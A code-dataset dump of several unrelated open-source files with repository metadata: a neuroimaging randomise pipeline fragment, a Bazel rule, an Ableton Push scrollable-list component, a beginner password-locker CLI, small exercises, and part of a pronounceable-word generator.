wf.connect(randomise,'tstat_files', ds,'tstat_files')
wf.connect(randomise,'t_corrected_p_files', ds,'t_corrected_p_files')
wf.connect(select_tcorrp_files,'out_file', ds,'out_tcorr_corrected')
wf.connect(select_tstat_files,'out_file', ds,'out_tstat_corrected')
wf.connect(thresh,'out_file', ds,'randomise_pipe_thresh_tstat.nii.gz')
wf.connect(thresh_bin,'out_file', ds,'thresh_bin_out')
wf.connect(cluster,'index_file', ds,'index_file')
wf.connect(cluster,'threshold_file', ds,'threshold_file')
wf.connect(cluster,'localmax_txt_file', ds,'localmax_txt_file')
wf.connect(cluster,'localmax_vol_file', ds,'localmax_vol_file')
wf.connect(cluster,'max_file', ds,'max_file')
wf.connect(cluster,'mean_file', ds,'meal_file')
wf.connect(cluster,'pval_file', ds,'pval_file')
wf.connect(cluster,'size_file', ds,'size_file')
wf.run()
def run(group_config_path):
import re
import commands
commands.getoutput('source ~/.bashrc')
import os
import sys
import pickle
import yaml
group_config_obj = load_config_yml(group_config_path)
pipeline_output_folder = group_config_obj.pipeline_dir
if not group_config_obj.participant_list == None:
s_paths = group_config_obj.participant_list
else:
s_paths = [x for x in os.listdir(pipeline_output_folder) if os.path.isdir(x)]
merged_file = randomise_merged_file(s_paths)
out_file = randomise_merged_mask(s_paths)
prep_randomise_workflow(group_config_obj, merged_file=merged_file,mask_file=out_file,working_dir=None,output_dir=None,crash_dir=None)
| 5,183 | 0 | 69 |
6741da8a9b36218872414ff33253005a1ce3fbdc | 362 | bzl | Python | rules/jvm.bzl | tjarvstrand/rules_scala | ff423d8bdd0e5383f8f2c048ffd7704bb51a91bf | [
"Apache-2.0"
] | 53 | 2019-01-07T23:15:32.000Z | 2021-09-24T00:27:40.000Z | rules/jvm.bzl | tjarvstrand/rules_scala | ff423d8bdd0e5383f8f2c048ffd7704bb51a91bf | [
"Apache-2.0"
] | 101 | 2019-01-05T04:52:40.000Z | 2021-01-29T16:48:58.000Z | rules/jvm.bzl | tjarvstrand/rules_scala | ff423d8bdd0e5383f8f2c048ffd7704bb51a91bf | [
"Apache-2.0"
] | 24 | 2019-01-23T07:54:28.000Z | 2022-02-10T19:42:07.000Z | load("//rules/jvm:private/label.bzl", _labeled_jars_implementation = "labeled_jars_implementation")
# For bedtime reading:
# https://github.com/bazelbuild/bazel/issues/4584
# https://groups.google.com/forum/#!topic/bazel-discuss/mt2llfwzmac
labeled_jars = aspect(
implementation = _labeled_jars_implementation,
attr_aspects = ["deps"], # assumption
)
| 32.909091 | 99 | 0.765193 | load("//rules/jvm:private/label.bzl", _labeled_jars_implementation = "labeled_jars_implementation")
# For bedtime reading:
# https://github.com/bazelbuild/bazel/issues/4584
# https://groups.google.com/forum/#!topic/bazel-discuss/mt2llfwzmac
labeled_jars = aspect(
implementation = _labeled_jars_implementation,
attr_aspects = ["deps"], # assumption
)
| 0 | 0 | 0 |
e5310cbec155ea0ade26865aac5fe549b87cf496 | 290 | py | Python | tests/classes/simple_auth_code.py | Jesse-Yung/jsonclasses | d40c52aec42bcb978a80ceb98b93ab38134dc790 | [
"MIT"
] | 50 | 2021-08-18T08:08:04.000Z | 2022-03-20T07:23:26.000Z | tests/classes/simple_auth_code.py | Jesse-Yung/jsonclasses | d40c52aec42bcb978a80ceb98b93ab38134dc790 | [
"MIT"
] | 1 | 2021-02-21T03:18:09.000Z | 2021-03-08T01:07:52.000Z | tests/classes/simple_auth_code.py | Jesse-Yung/jsonclasses | d40c52aec42bcb978a80ceb98b93ab38134dc790 | [
"MIT"
] | 8 | 2021-07-01T02:39:15.000Z | 2021-12-10T02:20:18.000Z | from __future__ import annotations
from typing import Optional
from jsonclasses import jsonclass, types
@jsonclass
| 26.363636 | 71 | 0.77931 | from __future__ import annotations
from typing import Optional
from jsonclasses import jsonclass, types
@jsonclass
class SimpleAuthCode:
calling_code: Optional[str] = types.str.presentwith('phone_number')
phone_number: Optional[str] = types.str
code: str = types.str.required
| 0 | 151 | 22 |
16d294a6ffd5136b2ca8795b8d0d9efff3e2c7c0 | 17,534 | py | Python | APC400000/ScrollableList.py | martinpechmann/APC400000 | 0783dd2f7c3846684f785b15e651c61edf95e27c | [
"BSD-Source-Code"
] | 6 | 2019-09-15T18:46:49.000Z | 2021-09-10T06:36:10.000Z | APC400000/ScrollableList.py | martinpechmann/APC400000 | 0783dd2f7c3846684f785b15e651c61edf95e27c | [
"BSD-Source-Code"
] | 3 | 2015-06-14T22:47:01.000Z | 2015-06-17T14:24:47.000Z | APC400000/ScrollableList.py | martinpechmann/APC400000 | 0783dd2f7c3846684f785b15e651c61edf95e27c | [
"BSD-Source-Code"
] | 1 | 2016-12-21T12:18:14.000Z | 2016-12-21T12:18:14.000Z | # Embedded file name: c:\Jenkins\live\output\win_32_static\Release\midi-remote-scripts\Push\ScrollableList.py
from __future__ import with_statement
from functools import partial
from _Framework.Control import ButtonControl, EncoderControl, control_list
from _Framework.CompoundComponent import CompoundComponent
from _Framework.Util import forward_property, in_range, clamp, BooleanContext, index_if
from _Framework.SubjectSlot import subject_slot, Subject
from _Framework import Task, Defaults
from _Framework.ScrollComponent import ScrollComponent, Scrollable
import consts
class ScrollableListItem(object):
"""
Wrapper of an item of a scrollable list.
"""
@property
@property
@property
@property
class ScrollableList(Subject, Scrollable):
"""
Class for managing a visual subset of a list of items.
The items will be wrapped in an item_type instance.
"""
__subject_events__ = ('selected_item', 'item_activated', 'scroll')
item_type = ScrollableListItem
fixed_offset = None
@property
num_visible_items = property(_get_num_visible_items, _set_num_visible_items)
@property
def select_item_index_with_offset(self, index, offset):
"""
Selects an item index but moves the view such that there are,
if possible, 'offset' number of elements visible before the
selected one. Does nothing if the item was already selected.
"""
if not (index != self.selected_item_index and index >= 0 and index < len(self._items) and self.selected_item_index != -1):
raise AssertionError
self._offset = clamp(index - offset, 0, len(self._items))
self._normalize_offset(index)
self._do_set_selected_item_index(index)
def select_item_index_with_border(self, index, border_size):
"""
Selects an item with an index. Moves the view if the selection would exceed the
border of the current view.
"""
if self.fixed_offset is not None:
self.select_item_index_with_offset(index, self.fixed_offset)
elif index >= 0 and index < len(self._items):
if not in_range(index, self._offset + border_size, self._offset + self._num_visible_items - border_size):
offset = index - (self._num_visible_items - 2 * border_size) if self.selected_item_index < index else index - border_size
self._offset = clamp(offset, 0, len(self._items))
self._normalize_offset(index)
self._do_set_selected_item_index(index)
return
selected_item_index = property(_get_selected_item_index, _set_selected_item_index)
@property
@property
class ActionListItem(ScrollableListItem):
"""
Interface for an list element that can be actuated on.
"""
supports_action = False
class ActionList(ScrollableList):
"""
A scrollable list of items that can be actuated on.
"""
item_type = ActionListItem
class DefaultItemFormatter(object):
"""
Item formatter that will indicate selection and show action_message if the item
is currently performing an action
"""
action_message = 'Loading...'
class ListComponent(CompoundComponent):
"""
Component that handles a ScrollableList. If an action button is
passed, it can handle an ActionList.
"""
__subject_events__ = ('item_action',)
SELECTION_DELAY = 0.5
ENCODER_FACTOR = 10.0
empty_list_message = ''
_current_action_item = None
_last_action_item = None
action_button = ButtonControl(color='Browser.Load')
encoders = control_list(EncoderControl)
@property
scrollable_list = property(_get_scrollable_list, _set_scrollable_list)
select_next_button = forward_property('_scroller')('scroll_down_button')
select_prev_button = forward_property('_scroller')('scroll_up_button')
next_page_button = forward_property('_pager')('scroll_down_button')
prev_page_button = forward_property('_pager')('scroll_up_button')
@subject_slot('scroll')
@subject_slot('selected_item')
@encoders.value
@action_button.pressed
def _execute_action(self):
""" Is called by the execute action task and should not be called directly
use _trigger_action instead """
if self._current_action_item != None:
self.do_trigger_action(self._current_action_item)
self._last_action_item = self._current_action_item
self._current_action_item = None
self.update()
return
@property
@property | 39.940774 | 162 | 0.678853 | # Embedded file name: c:\Jenkins\live\output\win_32_static\Release\midi-remote-scripts\Push\ScrollableList.py
from __future__ import with_statement
from functools import partial
from _Framework.Control import ButtonControl, EncoderControl, control_list
from _Framework.CompoundComponent import CompoundComponent
from _Framework.Util import forward_property, in_range, clamp, BooleanContext, index_if
from _Framework.SubjectSlot import subject_slot, Subject
from _Framework import Task, Defaults
from _Framework.ScrollComponent import ScrollComponent, Scrollable
import consts
class ScrollableListItem(object):
"""
Wrapper of an item of a scrollable list.
"""
def __init__(self, index = None, content = None, scrollable_list = None, *a, **k):
super(ScrollableListItem, self).__init__(*a, **k)
self._content = content
self._index = index
self._scrollable_list = scrollable_list
def __str__(self):
return unicode(self._content)
@property
def content(self):
return self._content
@property
def index(self):
return self._index
@property
def container(self):
return self._scrollable_list
@property
def is_selected(self):
return self._scrollable_list and self._scrollable_list.is_selected(self)
def select(self):
return self._scrollable_list and self._scrollable_list.select_item(self)
class ScrollableList(Subject, Scrollable):
"""
Class for managing a visual subset of a list of items.
The items will be wrapped in an item_type instance.
"""
__subject_events__ = ('selected_item', 'item_activated', 'scroll')
item_type = ScrollableListItem
fixed_offset = None
def __init__(self, num_visible_items = 1, item_type = None, *a, **k):
super(ScrollableList, self).__init__(*a, **k)
if item_type != None:
self.item_type = item_type
self._items = []
self._num_visible_items = num_visible_items
self._selected_item_index = -1
self._last_activated_item_index = None
self._offset = 0
self._pager = Scrollable()
self._pager.scroll_up = self.prev_page
self._pager.scroll_down = self.next_page
self._pager.can_scroll_up = self.can_scroll_up
self._pager.can_scroll_down = self.can_scroll_down
return
@property
def pager(self):
return self._pager
def scroll_up(self):
if self.can_scroll_up():
self.select_item_index_with_border(self.selected_item_index - 1, 1)
self.notify_scroll()
def can_scroll_up(self):
return self._selected_item_index > 0
def scroll_down(self):
if self.can_scroll_down():
self.select_item_index_with_border(self.selected_item_index + 1, 1)
self.notify_scroll()
def can_scroll_down(self):
return self._selected_item_index < len(self._items) - 1
def _get_num_visible_items(self):
return self._num_visible_items
def _set_num_visible_items(self, num_items):
if not num_items >= 0: raise AssertionError
self._num_visible_items = num_items
self._normalize_offset(self._selected_item_index)
num_visible_items = property(_get_num_visible_items, _set_num_visible_items)
@property
def visible_items(self):
return self.items[self._offset:self._offset + self._num_visible_items]
def select_item_index_with_offset(self, index, offset):
"""
Selects an item index but moves the view such that there are,
if possible, 'offset' number of elements visible before the
selected one. Does nothing if the item was already selected.
"""
if not (index != self.selected_item_index and index >= 0 and index < len(self._items) and self.selected_item_index != -1):
raise AssertionError
self._offset = clamp(index - offset, 0, len(self._items))
self._normalize_offset(index)
self._do_set_selected_item_index(index)
def select_item_index_with_border(self, index, border_size):
"""
Selects an item with an index. Moves the view if the selection would exceed the
border of the current view.
"""
if self.fixed_offset is not None:
self.select_item_index_with_offset(index, self.fixed_offset)
elif index >= 0 and index < len(self._items):
if not in_range(index, self._offset + border_size, self._offset + self._num_visible_items - border_size):
offset = index - (self._num_visible_items - 2 * border_size) if self.selected_item_index < index else index - border_size
self._offset = clamp(offset, 0, len(self._items))
self._normalize_offset(index)
self._do_set_selected_item_index(index)
return
def next_page(self):
if self.can_scroll_down():
current_page = self.selected_item_index / self.num_visible_items
last_page_index = len(self.items) - self.num_visible_items
if self.selected_item_index < last_page_index:
index = clamp((current_page + 1) * self.num_visible_items, 0, len(self.items) - self.num_visible_items)
else:
index = len(self.items) - 1
self.select_item_index_with_offset(index, 0)
def prev_page(self):
if self.can_scroll_up():
current_page = self.selected_item_index / self.num_visible_items
last_page_index = len(self.items) - self.num_visible_items
if self.selected_item_index <= last_page_index:
index = clamp((current_page - 1) * self.num_visible_items, 0, len(self.items) - self.num_visible_items)
else:
index = max(len(self.items) - self.num_visible_items, 0)
self.select_item_index_with_offset(index, 0)
def _set_selected_item_index(self, index):
if not (index >= 0 and index < len(self._items) and self.selected_item_index != -1):
raise AssertionError
self._normalize_offset(index)
self._do_set_selected_item_index(index)
def _get_selected_item_index(self):
return self._selected_item_index
selected_item_index = property(_get_selected_item_index, _set_selected_item_index)
def _normalize_offset(self, index):
if index >= 0:
if index >= self._offset + self._num_visible_items:
self._offset = index - (self._num_visible_items - 1)
elif index < self._offset:
self._offset = index
self._offset = clamp(self._offset, 0, len(self._items) - self._num_visible_items)
@property
def selected_item(self):
return self._items[self.selected_item_index] if in_range(self._selected_item_index, 0, len(self._items)) else None
@property
def items(self):
return self._items
def assign_items(self, items):
old_selection = unicode(self.selected_item)
for item in self._items:
item._scrollable_list = None
self._items = tuple([ self.item_type(index=index, content=item, scrollable_list=self) for index, item in enumerate(items) ])
if self._items:
new_selection = index_if(lambda item: unicode(item) == old_selection, self._items)
self._selected_item_index = new_selection if in_range(new_selection, 0, len(self._items)) else 0
self._normalize_offset(self._selected_item_index)
else:
self._offset = 0
self._selected_item_index = -1
self._last_activated_item_index = None
self.notify_selected_item()
self.request_notify_item_activated()
return
def select_item(self, item):
self.selected_item_index = item.index
def is_selected(self, item):
return item and item.index == self.selected_item_index
def request_notify_item_activated(self):
if self._selected_item_index != self._last_activated_item_index:
self._last_activated_item_index = self._selected_item_index
self.notify_item_activated()
def _do_set_selected_item_index(self, index):
if index != self._selected_item_index:
self._selected_item_index = index
self.notify_selected_item()
class ActionListItem(ScrollableListItem):
"""
Interface for an list element that can be actuated on.
"""
supports_action = False
def action(self):
pass
class ActionList(ScrollableList):
"""
A scrollable list of items that can be actuated on.
"""
item_type = ActionListItem
class DefaultItemFormatter(object):
"""
Item formatter that will indicate selection and show action_message if the item
is currently performing an action
"""
action_message = 'Loading...'
def __call__(self, index, item, action_in_progress):
display_string = ''
if item:
display_string += consts.CHAR_SELECT if item.is_selected else ' '
display_string += self.action_message if action_in_progress else unicode(item)
return display_string
class ListComponent(CompoundComponent):
"""
Component that handles a ScrollableList. If an action button is
passed, it can handle an ActionList.
"""
__subject_events__ = ('item_action',)
SELECTION_DELAY = 0.5
ENCODER_FACTOR = 10.0
empty_list_message = ''
_current_action_item = None
_last_action_item = None
action_button = ButtonControl(color='Browser.Load')
encoders = control_list(EncoderControl)
def __init__(self, scrollable_list = None, data_sources = tuple(), *a, **k):
super(ListComponent, self).__init__(*a, **k)
self._data_sources = data_sources
self._activation_task = Task.Task()
self._action_on_scroll_task = Task.Task()
self._scrollable_list = None
self._scroller = self.register_component(ScrollComponent())
self._pager = self.register_component(ScrollComponent())
self.last_action_item = lambda : self._last_action_item
self.item_formatter = DefaultItemFormatter()
for c in (self._scroller, self._pager):
for button in (c.scroll_up_button, c.scroll_down_button):
button.color = 'List.ScrollerOn'
button.pressed_color = None
button.disabled_color = 'List.ScrollerOff'
if scrollable_list == None:
self.scrollable_list = ActionList(num_visible_items=len(data_sources))
else:
self.scrollable_list = scrollable_list
self._scrollable_list.num_visible_items = len(data_sources)
self._delay_activation = BooleanContext()
self._selected_index_float = 0.0
self._in_encoder_selection = BooleanContext(False)
self._execute_action_task = self._tasks.add(Task.sequence(Task.delay(1), Task.run(self._execute_action)))
self._execute_action_task.kill()
return
@property
def _trigger_action_on_scrolling(self):
return self.action_button.is_pressed
def _get_scrollable_list(self):
return self._scrollable_list
def _set_scrollable_list(self, new_list):
if new_list != self._scrollable_list:
self._scrollable_list = new_list
if new_list != None:
new_list.num_visible_items = len(self._data_sources)
self._scroller.scrollable = new_list
self._pager.scrollable = new_list.pager
self._on_scroll.subject = new_list
self._selected_index_float = new_list.selected_item_index
else:
self._scroller.scrollable = ScrollComponent.default_scrollable
self._scroller.scrollable = ScrollComponent.default_pager
self._on_selected_item_changed.subject = new_list
self.update_all()
return
scrollable_list = property(_get_scrollable_list, _set_scrollable_list)
def set_data_sources(self, sources):
self._data_sources = sources
if self._scrollable_list:
self._scrollable_list.num_visible_items = len(sources)
self._update_display()
select_next_button = forward_property('_scroller')('scroll_down_button')
select_prev_button = forward_property('_scroller')('scroll_up_button')
next_page_button = forward_property('_pager')('scroll_down_button')
prev_page_button = forward_property('_pager')('scroll_up_button')
def on_enabled_changed(self):
super(ListComponent, self).on_enabled_changed()
if not self.is_enabled():
self._execute_action_task.kill()
@subject_slot('scroll')
def _on_scroll(self):
if self._trigger_action_on_scrolling:
trigger_selected = partial(self._trigger_action, self.selected_item)
self._action_on_scroll_task.kill()
self._action_on_scroll_task = self._tasks.add(Task.sequence(Task.wait(Defaults.MOMENTARY_DELAY), Task.delay(1), Task.run(trigger_selected)))
@subject_slot('selected_item')
def _on_selected_item_changed(self):
self._scroller.update()
self._pager.update()
self._update_display()
self._update_action_feedback()
self._activation_task.kill()
self._action_on_scroll_task.kill()
if self.SELECTION_DELAY and self._delay_activation:
self._activation_task = self._tasks.add(Task.sequence(Task.wait(self.SELECTION_DELAY), Task.run(self._scrollable_list.request_notify_item_activated)))
else:
self._scrollable_list.request_notify_item_activated()
if not self._in_encoder_selection:
self._selected_index_float = float(self._scrollable_list.selected_item_index)
@encoders.value
def encoders(self, value, encoder):
self._add_offset_to_selected_index(value)
def _add_offset_to_selected_index(self, offset):
if self.is_enabled() and self._scrollable_list:
with self._delay_activation():
with self._in_encoder_selection():
self._selected_index_float = clamp(self._selected_index_float + offset * self.ENCODER_FACTOR, 0, len(self._scrollable_list.items))
self._scrollable_list.select_item_index_with_border(int(self._selected_index_float), 1)
@action_button.pressed
def action_button(self, button):
if self._current_action_item == None:
self._trigger_action(self.next_item if self._action_target_is_next_item() else self.selected_item)
return
def do_trigger_action(self, item):
item.action()
self.notify_item_action(item)
def _trigger_action(self, item):
if self.is_enabled() and self._can_be_used_for_action(item):
if self._scrollable_list != None:
self._scrollable_list.select_item(item)
self._current_action_item = item
self.update()
self._execute_action_task.restart()
return
def _execute_action(self):
""" Is called by the execute action task and should not be called directly
use _trigger_action instead """
if self._current_action_item != None:
self.do_trigger_action(self._current_action_item)
self._last_action_item = self._current_action_item
self._current_action_item = None
self.update()
return
@property
def selected_item(self):
return self._scrollable_list.selected_item if self._scrollable_list != None else None
@property
def next_item(self):
item = None
if self._scrollable_list != None:
all_items = self._scrollable_list.items
next_index = self._scrollable_list.selected_item_index + 1
item = all_items[next_index] if in_range(next_index, 0, len(all_items)) else None
return item
def _can_be_used_for_action(self, item):
return item != None and item.supports_action and item != self.last_action_item()
def _action_target_is_next_item(self):
return self.selected_item == self.last_action_item() and self._can_be_used_for_action(self.next_item)
def _update_action_feedback(self):
color = 'Browser.Loading'
if self._current_action_item == None:
if self._action_target_is_next_item():
color = 'Browser.LoadNext'
elif self._can_be_used_for_action(self.selected_item):
color = 'Browser.Load'
else:
color = 'Browser.LoadNotPossible'
self.action_button.color = color
return
def _update_display(self):
visible_items = self._scrollable_list.visible_items if self._scrollable_list else []
for index, data_source in enumerate(self._data_sources):
item = visible_items[index] if index < len(visible_items) else None
action_in_progress = item and item == self._current_action_item
display_string = self.item_formatter(index, item, action_in_progress)
data_source.set_display_string(display_string)
if not visible_items and self._data_sources and self.empty_list_message:
self._data_sources[0].set_display_string(self.empty_list_message)
return
def update(self):
super(ListComponent, self).update()
if self.is_enabled():
self._update_action_feedback()
self._update_display() | 11,615 | 0 | 1,335 |
ed7f640db0df0ad410d1d1d529fb36cc323cbfe7 | 7,376 | py | Python | interface.py | wangechimk/password-locker | 098e8ea3fd5f145416acd897f66e6e48ab94fad6 | [
"MIT"
] | null | null | null | interface.py | wangechimk/password-locker | 098e8ea3fd5f145416acd897f66e6e48ab94fad6 | [
"MIT"
] | null | null | null | interface.py | wangechimk/password-locker | 098e8ea3fd5f145416acd897f66e6e48ab94fad6 | [
"MIT"
] | null | null | null | from locker import User, Credentials
function()
def create_user(username, password):
'''
Function to create a new user with a username and password
'''
return User(username, password)
def save_user(user):
'''
Function to save a new user
'''
user.save_user()
def display_user():
"""
Function to display existing user
"""
return User.display_user()
def create_new_credential(account, userName, password):
"""
Function that creates new credentials for a given user account
"""
return Credentials(account, userName, password)
def save_credentials(credentials):
"""
Function to save Credentials
"""
credentials.save_credential()
def display_accounts_details():
"""
Function that returns all the saved credential.
"""
return Credentials.display_credentials()
def del_credential(credentials):
"""
Function to delete a Credentials from credentials list
"""
credentials.delete_credentials()
def find_credential(account):
"""
Function that finds a Credentials by an account name and returns the Credentials that belong to that account
"""
return Credentials.find_credential(account)
def check_credentials(account):
"""
Function that check if a Credentials exists with that account name and return true or false
"""
return Credentials.if_credential_exist(account)
def generate_Password():
'''
generates a random password for the user.
'''
return Credentials.generate_random_password()
if __name__ == '__main__':
locker()
| 35.12381 | 142 | 0.539317 | from locker import User, Credentials
def function():
print(" __ __ __ ")
print("| | | | | | ")
print("| |__| | | | ")
print("| __ | | | ")
print("| | | | | | ")
print("|__| |__| |__| ")
function()
def create_user(username, password):
'''
Function to create a new user with a username and password
'''
return User(username, password)
def save_user(user):
'''
Function to save a new user
'''
user.save_user()
def display_user():
"""
Function to display existing user
"""
return User.display_user()
def login_user(username, password):
return User(username, password).login()
def create_new_credential(account, userName, password):
"""
Function that creates new credentials for a given user account
"""
return Credentials(account, userName, password)
def save_credentials(credentials):
"""
Function to save Credentials
"""
credentials.save_credential()
def display_accounts_details():
"""
Function that returns all the saved credential.
"""
return Credentials.display_credentials()
def del_credential(credentials):
"""
Function to delete a Credentials from credentials list
"""
credentials.delete_credentials()
def find_credential(account):
"""
Function that finds a Credentials by an account name and returns the Credentials that belong to that account
"""
return Credentials.find_credential(account)
def check_credentials(account):
"""
Function that check if a Credentials exists with that account name and return true or false
"""
return Credentials.if_credential_exist(account)
def generate_Password():
'''
generates a random password for the user.
'''
return Credentials.generate_random_password()
def locker():
print(
"Hello Welcome to your Accounts credentials store 🤖 ...\n 1."
" Create New Account ----- CA \n 2. Have An Account -------- LI \n"
)
short_code = input("").lower().strip()
if short_code == "ca":
print("Sign Up")
print('*' * 50)
username = input("User_name: ")
while True:
print(" TP - To type your own password:\n GP - To generate random Password")
password_Choice = input().lower().strip()
if password_Choice == 'tp':
password = input("Enter Password\n")
break
elif password_Choice == 'gp':
password = generate_Password()
break
else:
print("Invalid password please try again")
save_user(create_user(username, password))
print("*" * 50)
print(f"Hello {username}, Your account has been created successfully 💯 ! Your password is: {password}")
print('\n')
elif short_code == "li":
print("*" * 50)
print("Enter your User name and your Password to log in:")
print('*' * 50)
username = input("User name: ")
password = input("password: ")
login = login_user(username, password)
if login_user == login:
print(f"Hello {username}.Welcome To Password-locker 👋 †")
print('\n')
print("what would you like to do?")
print('\n')
while True:
print(
"Use these short codes:\n CC - "
"Create a new credential \n DC - Display Credentials \n FC - Find a credential \n GP"
" - Generate A random password \n D - Delete credential \n EX - Exit the application \n"
)
short_code = input().lower().strip()
if short_code == 'cc':
print("Create New Credential")
print("." * 20)
print("Account name ....")
account = input().capitalize()
print("Your Account username")
user_Name = input()
while True:
print(" TP - To type your own password:\n GP - To generate random Password")
password_Choice = input().lower().strip()
if password_Choice == 'tp':
password = input("Enter Password\n")
break
elif password_Choice == 'gp':
password = generate_Password()
break
elif password_Choice != 'tp' or 'gp':
print("Invalid password please try again")
break
else:
print("Invalid password please try again")
save_credentials(Credentials(account, user_Name, password))
print('\n')
print(f"New Credential : {account} UserName: {user_Name} Password:{password} created successfully 🤓 ")
print('\n')
elif short_code == "dc":
if display_accounts_details():
print("Here's your list of account(s):🗒️ ")
print('_' * 30)
for account in display_accounts_details():
print(f" Account:{account.credential} \n User Name:{username}\n Password:{password}")
print('_' * 30)
print('*' * 30)
else:
print("You don't have any credentials saved yet..........")
elif short_code == "fc":
print("Enter the Account Name you want to search for")
search_name = input().capitalize()
if find_credential(search_name):
search_credential = find_credential(search_name)
print(f"Account Name : {search_credential.credential}")
print('-' * 50)
print(f"User Name: {search_credential.username} Password :{search_credential.password}")
else:
print("That Credential does not exist 🤡 ")
print('\n')
elif short_code == "d":
print("Enter the account name of the Credentials you want to delete")
search_name = input().capitalize()
if check_credentials(search_name):
search_credential = find_credential(search_name)
print(f"{search_credential.credential}")
print("_" * 30)
search_credential.delete_credentials()
print('\n')
print(f"New Credential : {search_credential.credential} UserName: {search_credential.username} successfully deleted !!!")
print('\n')
else:
print("That Credential does not exist 🌚 ")
elif short_code == 'gp':
password = generate_Password()
print(f" {password} Has been generated successfully. You can proceed to use it to your account 👍 ")
elif short_code == 'ex':
print("Thanks for using passwords store manager.. See you next time!😃 ")
break
else:
print("Check your entry again and let it match those in the menu")
else:
print("Please enter a valid input to continue ❌ ")
if __name__ == '__main__':
locker()
| 5,739 | 0 | 69 |
d6ca7107dca220bd065ae762b2e3cc75fdc14130 | 151 | py | Python | instructors/lessons/practical_utils/examples/in_class/1_answer_ashwini.py | mgadagin/PythonClass | 70b370362d75720b3fb0e1d6cc8158f9445e9708 | [
"MIT"
] | 46 | 2017-09-27T20:19:36.000Z | 2020-12-08T10:07:19.000Z | instructors/lessons/practical_utils/examples/in_class/1_answer_ashwini.py | mgadagin/PythonClass | 70b370362d75720b3fb0e1d6cc8158f9445e9708 | [
"MIT"
] | 6 | 2018-01-09T08:07:37.000Z | 2020-09-07T12:25:13.000Z | instructors/lessons/practical_utils/examples/in_class/1_answer_ashwini.py | mgadagin/PythonClass | 70b370362d75720b3fb0e1d6cc8158f9445e9708 | [
"MIT"
] | 18 | 2017-10-10T02:06:51.000Z | 2019-12-01T10:18:13.000Z | import datetime
dt = '21/03/2012'
day, month, year = (int(x) for x in dt.split('/'))
ans = datetime.date(year, month, day)
print ans.strftime("%A") | 30.2 | 54 | 0.642384 | import datetime
dt = '21/03/2012'
day, month, year = (int(x) for x in dt.split('/'))
ans = datetime.date(year, month, day)
print ans.strftime("%A") | 0 | 0 | 0 |
e621b823641691f1b5003f94127d4245a6724492 | 429 | py | Python | 011.RemoveElement.py | br71/challenges | 355cd4984cf5e7f81827f306841ddc7b9382a820 | [
"Apache-2.0"
] | null | null | null | 011.RemoveElement.py | br71/challenges | 355cd4984cf5e7f81827f306841ddc7b9382a820 | [
"Apache-2.0"
] | null | null | null | 011.RemoveElement.py | br71/challenges | 355cd4984cf5e7f81827f306841ddc7b9382a820 | [
"Apache-2.0"
] | null | null | null |
nums = [2,1,0,1,2,2,3,0,4,2]
val = 2
s = Solution()
print(s.removeElement(nums,val)) | 15.888889 | 44 | 0.391608 | class Solution:
def removeElement(self,nums,val) -> int:
i = 0
j = len(nums)
while True:
if nums[i] == val:
del nums[i]
j = j - 1
else:
i = i +1
if i == j:
break
print (nums)
return i
nums = [2,1,0,1,2,2,3,0,4,2]
val = 2
s = Solution()
print(s.removeElement(nums,val)) | 300 | -6 | 48 |
285a7dd054f231627b9c6e65b8de5c6c71ff61dc | 2,861 | py | Python | plentshwoitre.py | jedav/plentshwoitre | 0fda2efdf0d3eef4f5d9735a12ff35b907b1d362 | [
"MIT"
] | 2 | 2020-02-23T20:44:08.000Z | 2020-12-10T17:12:08.000Z | plentshwoitre.py | jedav/plentshwoitre | 0fda2efdf0d3eef4f5d9735a12ff35b907b1d362 | [
"MIT"
] | null | null | null | plentshwoitre.py | jedav/plentshwoitre | 0fda2efdf0d3eef4f5d9735a12ff35b907b1d362 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import argparse
import random
onsets = [
"b",
"c",
"d",
"f",
"g",
"h",
"j",
"k",
"l",
"m",
"n",
"p",
"r",
"s",
"t",
"v",
"w",
"pl",
"bl",
"kl",
"ɡl",
"pr",
"br",
"tr",
"dr",
"kr",
"ɡr",
"tw",
"dw",
"ɡw",
"kw",
"pw",
"fl",
"sl",
"dʒ",
"θl",
"fr",
"θr",
"ʃr",
"hw",
"sw",
"θw",
"vw",
"pj",
"bj",
"tj",
"dj",
"kj",
"ɡj",
"mj",
"nj",
"fj",
"vj",
"θj",
"sj",
"zj",
"hj",
"lj",
"sp",
"st",
"sk",
"sm",
"sn",
"sf",
"sθ",
"spl",
"skl",
"spr",
"str",
"skr",
"skw",
"smj",
"spj",
"stj",
"skj",
"sfr",
]
nuclei = [
"a",
"e",
"i",
"o",
"u",
"oo",
"ui",
"oi",
"ai",
"ae",
"ee",
"ei",
"ie",
]
codas = [
"b",
"c",
"d",
"f",
"g",
"k",
"l",
"m",
"n",
"p",
"r",
"s",
"t",
"v",
"ŋ",
"lp",
"lb",
"lt",
"ld",
"ltʃ",
"ldʒ",
"lk",
"rp",
"rb",
"rt",
"rd",
"rtʃ",
"rdʒ",
"rk",
"rɡ",
"lf",
"lv",
"lθ",
"ls",
"lʃ",
"rf",
"rv",
"rθ",
"rs",
"rz",
"rʃ",
"lm",
"ln",
"rm",
"rn",
"rl",
"mp",
"nt",
"nd",
"ntʃ",
"ndʒ",
"ŋk",
"mf",
"mθ",
"nθ",
"ns",
"nz",
"ŋθ",
"ft",
"sp",
"st",
"sk",
"fθ",
"pt",
"kt",
"pθ",
"ps",
"tθ",
"ts",
"dθ",
"ks",
"lpt",
"lps",
"lfθ",
"lts",
"lst",
"lkt",
"lks",
"rmθ",
"rpt",
"rps",
"rts",
"rst",
"rkt",
"mpt",
"mps",
"ndθ",
"ŋkt",
"ŋks",
"ŋkθ",
"ksθ",
"kst",
]
if __name__ == "__main__":
main()
| 12.226496 | 93 | 0.47396 | #!/usr/bin/env python3
import argparse
import random
onsets = [
"b",
"c",
"d",
"f",
"g",
"h",
"j",
"k",
"l",
"m",
"n",
"p",
"r",
"s",
"t",
"v",
"w",
"pl",
"bl",
"kl",
"ɡl",
"pr",
"br",
"tr",
"dr",
"kr",
"ɡr",
"tw",
"dw",
"ɡw",
"kw",
"pw",
"fl",
"sl",
"dʒ",
"θl",
"fr",
"θr",
"ʃr",
"hw",
"sw",
"θw",
"vw",
"pj",
"bj",
"tj",
"dj",
"kj",
"ɡj",
"mj",
"nj",
"fj",
"vj",
"θj",
"sj",
"zj",
"hj",
"lj",
"sp",
"st",
"sk",
"sm",
"sn",
"sf",
"sθ",
"spl",
"skl",
"spr",
"str",
"skr",
"skw",
"smj",
"spj",
"stj",
"skj",
"sfr",
]
nuclei = [
"a",
"e",
"i",
"o",
"u",
"oo",
"ui",
"oi",
"ai",
"ae",
"ee",
"ei",
"ie",
]
codas = [
"b",
"c",
"d",
"f",
"g",
